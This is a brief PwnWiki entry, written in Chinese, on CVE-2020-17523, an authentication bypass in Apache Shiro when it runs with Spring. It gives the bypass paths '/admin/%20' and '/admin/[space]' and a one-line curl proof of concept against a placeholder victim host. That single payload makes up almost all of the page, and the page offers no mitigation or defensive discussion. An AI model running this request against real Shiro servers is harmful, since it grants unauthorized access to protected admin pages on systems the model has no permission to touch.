CVE-2020-17523 Apache Shiro pathMatches 身份認證繞過漏洞

From PwnWiki
This page is a translated version of the page CVE-2020-17523 Apache Shiro pathMatches 身份認證繞過漏洞 and the translation is 100% complete.
Other languages:
Chinese • ‎中文(台灣)‎

條件

Shiro with Spring


/admin/[space]
/admin/%20

POC

curl -v http://[Vimtim]/admin/%20/